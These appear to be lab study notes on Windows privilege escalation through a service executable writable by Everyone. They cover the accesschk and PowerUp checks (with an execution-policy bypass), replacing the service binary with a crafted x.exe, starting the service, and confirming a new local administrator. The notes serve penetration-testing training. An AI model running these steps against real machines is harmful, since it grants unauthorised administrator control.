- Executables with FILE_FULL_ACCESS permission
Check in CMD:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
fileperservice.exe has FILE_ALL_ACCESS for Everyone! (we can exploit it!)
Check in PowerUp (via Powershell) (this is more realistic):
shift + right click in folder of PowerUp and open a cmd
powershell
powershell -ep bypass
. .\PowerUp.PS1
Invoke- #then auto tab for Invoke-AllChecks
Exploitation:
Assumes we already have x.exe we created in regsvc ACL moved to Temp folder on Windows already
Windows CMD:
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"sc start filepermsvcCheck for users added:
net localgroup administrators